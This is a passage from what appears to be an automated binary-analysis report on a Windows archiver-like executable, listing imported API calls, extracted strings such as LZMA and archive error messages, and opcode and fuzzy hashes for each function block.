                                        • EnterCriticalSection.KERNEL32(00662938), ref: 005D6044
                                        • LeaveCriticalSection.KERNEL32(00662938), ref: 005D6060
                                        Strings
                                        Similarity
                                        • API ID: CriticalSection$EnterH_prologLeave
                                        • String ID: v$8)f
                                        • API String ID: 367238759-2823517967
                                        • Opcode ID: bd37cb31df51f8bdb1b39d906bcbfdc1b4161bf87f998dc35636cb2c7a76e8be
                                        • Instruction ID: 1dccdd688e34a5b0562cbd474ac7e468910aca07d865bdacdbbd3d96c94f8cdb
                                        • Instruction Fuzzy Hash: 8FF09A36901104EFC700CF98C809ADEBFB9FF86360F10806AF405A7311C7B69A00CBA0
                                        APIs
                                        • memset.MSVCRT ref: 006003F5
                                        • memcpy.MSVCRT(?,?,00000008,00000064,?,?,?,?,00000064), ref: 00600490
                                        • memset.MSVCRT ref: 00600618
                                        Strings
                                        Similarity
                                        • API ID: memset$memcpy
                                        • String ID: $@
                                        • API String ID: 368790112-1077428164
                                        • Opcode ID: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                                        • Instruction ID: 77856c277a791083f8becfc5c97a200602818f5c29e2da4bfd894644ac2e590f
                                        • Instruction Fuzzy Hash: 3291CF30980309EFEB69DF24C841BDBB7B3AF50304F14845DE59A562D2DB71AA99CF84
                                        APIs
                                          • Part of subcall function 00632FB0: EnterCriticalSection.KERNEL32(?,?,?,00632749), ref: 00632FB8
                                          • Part of subcall function 00632FB0: LeaveCriticalSection.KERNEL32(?,?,?,00632749), ref: 00632FC2
                                        • EnterCriticalSection.KERNEL32(?), ref: 0063290E
                                        • LeaveCriticalSection.KERNEL32(?), ref: 00632928
                                        • EnterCriticalSection.KERNEL32(?), ref: 00632992
                                        • LeaveCriticalSection.KERNEL32(?), ref: 006329B8
                                        • EnterCriticalSection.KERNEL32(?), ref: 00632A1E
                                        • LeaveCriticalSection.KERNEL32(?), ref: 00632A56
                                        Strings
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave
                                        • String ID: v
                                        • API String ID: 3168844106-3261393531
                                        • Opcode ID: 2e39fc7d48fd9ed5d669777fc3e5b631b6e2b48fb844fb0256971b5a183ea1ef
                                        • Instruction ID: 9679fbf71ff9f7defadef26a772c617edc583b0878ec85b076fd6092812533de
                                        • Instruction Fuzzy Hash: 0961F7755047028FC761DF25C4A0BABB3F2BF98754F104A1DE9AA87351EB30E949CB91
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A6141
                                          • Part of subcall function 005A6C72: __EH_prolog.LIBCMT ref: 005A6C77
                                        • SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 005A6197
                                        • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 005A626E
                                        • SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 005A62A9
                                          • Part of subcall function 005A6096: __EH_prolog.LIBCMT ref: 005A609B
                                          • Part of subcall function 005A6096: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 005A60DF
                                        • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 005A6285
                                        Similarity
                                        • API ID: ErrorLast$H_prolog$DeleteFile
                                        • String ID:
                                        • API String ID: 3586524497-0
                                        • Opcode ID: 35358003652bea4feb4bbd7d9802d7934c622d1c412ab8d5478899c07748067c
                                        • Instruction ID: 1a2671a87d4fe5f73129e3aec8d8ff8e89e0585767cf46c9a54f718160e7f2cb
                                        • Instruction Fuzzy Hash: FA51DD31C0421AEADF15EBE8D85ABEDBFB9BF53350F144069E85273192CB351A0ACB51
                                        APIs
                                        • memcmp.MSVCRT(?,006548A0,00000010), ref: 005B44DB
                                        • memcmp.MSVCRT(?,00650128,00000010), ref: 005B44EE
                                        • memcmp.MSVCRT(?,00650228,00000010), ref: 005B450B
                                        • memcmp.MSVCRT(?,00650248,00000010), ref: 005B4528
                                        • memcmp.MSVCRT(?,006501C8,00000010), ref: 005B4545
                                        Similarity
                                        • API ID: memcmp
                                        • String ID:
                                        • API String ID: 1475443563-0
                                        • Opcode ID: c2fe881849b1e2ef06188a0a98cd92b7d34a4bac484a6da17d79b32a1c9245d4
                                        • Instruction ID: d6b07d9b7552dfa5f520ddec92535607c474d0f6d4abd8f581f2046af03ef247
                                        • Instruction Fuzzy Hash: 91218372B806086BE7348E149C81FFF77A9AF507A5F018538FD059A286FA64ED048B91
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: !$LZMA2:$LZMA:
                                        • API String ID: 3519838083-3332058968
                                        • Opcode ID: 2efb8ba7fe4c3969e515766f0cb47482542fdcc168073861d9c043102fcdf90f
                                        • Instruction ID: 06bc7d1986d1e26228503e7ad317e9f9e37fd6bb0fe537278256c0e4d40607b7
                                        • Instruction Fuzzy Hash: 0561D03190018A9EDF2DCB6AC459BFE7FB1BF56344F1444AAE4866B162C770EE82C740
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005AA389
                                          • Part of subcall function 005AA4C5: GetModuleHandleW.KERNEL32(ntdll.dll,?,005AA3C1,00000001), ref: 005AA4CD
                                          • Part of subcall function 005AA4C5: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 005AA4DD
                                        Strings
                                        Similarity
                                        • API ID: AddressH_prologHandleModuleProc
                                        • String ID: : $ SP:$Windows
                                        • API String ID: 786088110-3655538264
                                        • Opcode ID: aa443851811e59b0f44d1f643a9a9ca06fe5f5cadaea63eab5234eb49b2eaec5
                                        • Instruction ID: a5719e2babddb32ea0fcab16d66e29ef276d6ab1a0ea709d16f545990972da8c
                                        • Instruction Fuzzy Hash: 77312B31C0021A9BCF15EBA8C85B9EEBFB5BF9A700F404069F50272191EF755A85CFA1
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B06FB
                                        • EnterCriticalSection.KERNEL32(?), ref: 005B070B
                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 005B0786
                                          • Part of subcall function 005B089E: _CxxThrowException.MSVCRT(?,00654A58), ref: 005B08C4
                                        Strings
                                        Similarity
                                        • API ID: CriticalSection$EnterExceptionH_prologLeaveThrow
                                        • String ID: v
                                        • API String ID: 4150843469-3261393531
                                        • Opcode ID: 20639840215dd5581c3aed8f5e1bada6cc6a05ba862626e4f664b04bafc6066a
                                        • Instruction ID: 7feac8c6c6292a3c6e604ef04531d0e60d9c3654063aff4aefb9e3ca0f6d82d6
                                        • Instruction Fuzzy Hash: 472147B5A10605DFCB64DF28C584BAABBF1FF48314F10892EE44A8BA42DB35A915CB40
                                        APIs
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,005AA3C1,00000001), ref: 005AA4CD
                                        • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 005AA4DD
                                        Strings
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: RtlGetVersion$ntdll.dll
                                        • API String ID: 1646373207-1489217083
                                        • Opcode ID: 75d4adf1cee4fe5d1151e46df9b510807a0b2e3f2b4588fbc737365e8a00ca2a
                                        • Instruction ID: 857dc68af100085b46bbe7c6eaa1c32c49ad6167179e0d8e5147cd9bcd75573f
                                        • Instruction Fuzzy Hash: B0D0C7713562101AFBB4A6B87C0EFEE1A4D9F56B717064456F800D1141FBD49D8241A1
                                        APIs
                                        • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 005C0359
                                        • GetLastError.KERNEL32(?,?,00000000,?), ref: 005C0382
                                        • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 005C03DA
                                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 005C03F0
                                        Similarity
                                        • API ID: ErrorFileLastSecurity
                                        • String ID:
                                        • API String ID: 555121230-0
                                        • Opcode ID: ee0b4d8a3d4749b5d7e2dcdb17d1d672adf210889f058c84b5d4bef614f17b40
                                        • Instruction ID: eb4dfa423ec53288e072cbfd1fe906c410dd76f7eb083d4eaa014a0e25cac61b
                                        • Instruction Fuzzy Hash: F2315874900209EFDB10DFE8C884FAEBBB5FF44704F108959E566A7291D770AE41DBA0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A8300
                                        • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 005A834F
                                        • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 005A837C
                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 005A839B
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Similarity
                                        • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                                        • String ID:
                                        • API String ID: 1689166341-0
                                        • Opcode ID: 3703caadd6c589515f003aad634be13d1fbd304901317082283de7af39138800
                                        • Instruction ID: d15d37c4939b3bf27e372815c00653135315724646e4760e4b2f925dd5979d2d
                                        • Instruction Fuzzy Hash: 1521C5B6900108AFDF119F94DC85AEEBFBAFF9A750F10046EF905A7251CA724E04CA64
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: BlockPackSize$BlockUnpackSize
                                        • API String ID: 3519838083-5494122
                                        • Opcode ID: cbbadecf32d25878c0384d9bd3aa5c1137e0004021e8ee6f33cbcdef69244216
                                        • Instruction ID: 59c2664f4c7abc0813173c59de28c98101621f31894de4e682055b10753c1c56
                                        • Instruction Fuzzy Hash: 5551CF75C042C59ECF3E8BA688B1AFDBFA1BF363C0F18845ED2D6570A2D6215988D705
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005AA4F8
                                          • Part of subcall function 005AA384: __EH_prolog.LIBCMT ref: 005AA389
                                          • Part of subcall function 005A9E14: GetSystemInfo.KERNEL32(?), ref: 005A9E36
                                          • Part of subcall function 005A9E14: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 005A9E50
                                          • Part of subcall function 005A9E14: GetProcAddress.KERNEL32(00000000), ref: 005A9E57
                                        • strcmp.MSVCRT ref: 005AA564
                                        Strings
                                        Similarity
                                        • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                                        • String ID: -
                                        • API String ID: 2798778560-3695764949
                                        • Opcode ID: e4eb03cd6537e64cff77b50e1ac0ce3643506e11ec6c151313add7a4764c00e4
                                        • Instruction ID: f4b639ea08faf3090c2dcd56161309863264ea66ae89640131940a6531cdaee8
                                        • Opcode Fuzzy Hash: e4eb03cd6537e64cff77b50e1ac0ce3643506e11ec6c151313add7a4764c00e4
                                        • Instruction Fuzzy Hash: 7E315C31D0121A9BCF19FBE4D85A9EDBFB5BF96310F10401AF40172192DF355A45CAA5
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: 0$x
                                        • API String ID: 3519838083-1948001322
                                        • Opcode ID: 2fc63cfb4c5702a76d291a689bef97c3e04fbfb392bc3e45e13ab49fd376f637
                                        • Instruction ID: e7e8036b5f15d92be83fc8a2e1f44fabaa4a392133edfd99557c2f43c741483a
                                        • Opcode Fuzzy Hash: 2fc63cfb4c5702a76d291a689bef97c3e04fbfb392bc3e45e13ab49fd376f637
                                        • Instruction Fuzzy Hash: C0214F36D0121A9BCF14EFD8D9966EEBBB5FF89304F10016AE80177241DB755E05CBA0
                                        APIs
                                        Strings
                                        • Cannot open encrypted archive. Wrong password?, xrefs: 005D8698
                                        • Cannot open the file as archive, xrefs: 005D86D0
                                        Similarity
                                        • API ID: fputs
                                        • String ID: Cannot open encrypted archive. Wrong password?$Cannot open the file as archive
                                        • API String ID: 1795875747-1623556331
                                        • Opcode ID: 9467b3d8c7bf0c6a1d25ae8fd1552218f4189a3eba6ba0eceb66c2e1116e3959
                                        • Instruction ID: 632bd2001feb0f888cc1187d65a495aeed45e5fd26d5a43d18e5111465f1bf11
                                        • Opcode Fuzzy Hash: 9467b3d8c7bf0c6a1d25ae8fd1552218f4189a3eba6ba0eceb66c2e1116e3959
                                        • Instruction Fuzzy Hash: 3F01A2353042009FC724A768E499A7EBBA7BFC9320F54441BF50287785DF74A801CB15
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00604039
                                          • Part of subcall function 006040BA: __EH_prolog.LIBCMT ref: 006040BF
                                          • Part of subcall function 005E5E2B: __EH_prolog.LIBCMT ref: 005E5E30
                                        Strings
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: D.e$T.e
                                        • API String ID: 3519838083-862335121
                                        • Opcode ID: 13b7856137174cc8b3044583aea78dd67867b6e9a4ef02493bda5e6316c9622f
                                        • Instruction ID: fe1b2ac6e6ebd57b4344c26aa14f343492040739126378a61be89a4a769c3c99
                                        • Opcode Fuzzy Hash: 13b7856137174cc8b3044583aea78dd67867b6e9a4ef02493bda5e6316c9622f
                                        • Instruction Fuzzy Hash: 9B012CB0A117418FC768DF64C45528ABFF6BF09704F10895ED49A93741EBB0A608CB91
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: fputs
                                        • String ID: =
                                        • API String ID: 1795875747-2525689732
                                        • Opcode ID: 8e9084f5f53209aebb03cef65366d371f65ad274a799dbef2702b97802df8914
                                        • Instruction ID: d2da46a231887c522680fb037f544a957778efd0acef3954e48061bc939276d6
                                        • Opcode Fuzzy Hash: 8e9084f5f53209aebb03cef65366d371f65ad274a799dbef2702b97802df8914
                                        • Instruction Fuzzy Hash: 8BE09A7AA001159BCB00ABADAC458BE7F2AFB81714B000823E420CB201EA609921CBD0
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: fputs$fputc
                                        • String ID: `&f
                                        • API String ID: 1185151155-3499709819
                                        • Opcode ID: 4eef11d4b199c902ee8515b3963f308de80295fb7533d15932e9d27e45df8375
                                        • Instruction ID: 12c88a67c43b9b4c2e58a9d8a287f68906dab0065292133d71a873c2bd601bde
                                        • Opcode Fuzzy Hash: 4eef11d4b199c902ee8515b3963f308de80295fb7533d15932e9d27e45df8375
                                        • Instruction Fuzzy Hash: 0CD02E327021222BCB223BED7C40C5EBF5AFFC5B21306040BF880A7312C661AD509BE0
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: fputs
                                        • String ID: Unsupported Windows version$p&f
                                        • API String ID: 1795875747-833034638
                                        • Opcode ID: 7a1b4013419bd6d0e6758f195f33de11333d578e2222251f361e63d31fe9b43b
                                        • Instruction ID: 09676f02803e2a4fbc8970747c1c5f570def50ca7a461f669bf7120d7b936297
                                        • Opcode Fuzzy Hash: 7a1b4013419bd6d0e6758f195f33de11333d578e2222251f361e63d31fe9b43b
                                        • Instruction Fuzzy Hash: 5AD0A937308201EFDB098B88F846BA83BA2E388721F20182BE002CA290D7B660008A00
                                        APIs
                                        • memcmp.MSVCRT(?,006548A0,00000010), ref: 006041D6
                                        • memcmp.MSVCRT(?,00650168,00000010), ref: 006041F1
                                        • memcmp.MSVCRT(?,006501E8,00000010), ref: 00604205
                                        Similarity
                                        • API ID: memcmp
                                        • String ID:
                                        • API String ID: 1475443563-0
                                        • Opcode ID: d26ed954bc70f89e2da98e7acbf7244c062a02e4fcf4f0c54fc22b75c2374086
                                        • Instruction ID: e30f4f69296c6c183944fa4b4e78538766de7d77e1124f45dc1b6c940a1e319e
                                        • Opcode Fuzzy Hash: d26ed954bc70f89e2da98e7acbf7244c062a02e4fcf4f0c54fc22b75c2374086
                                        • Instruction Fuzzy Hash: 5B01E1B17C020567E7244B118C42FBF73AA9F64761F054428FF459B281FAB4EA408394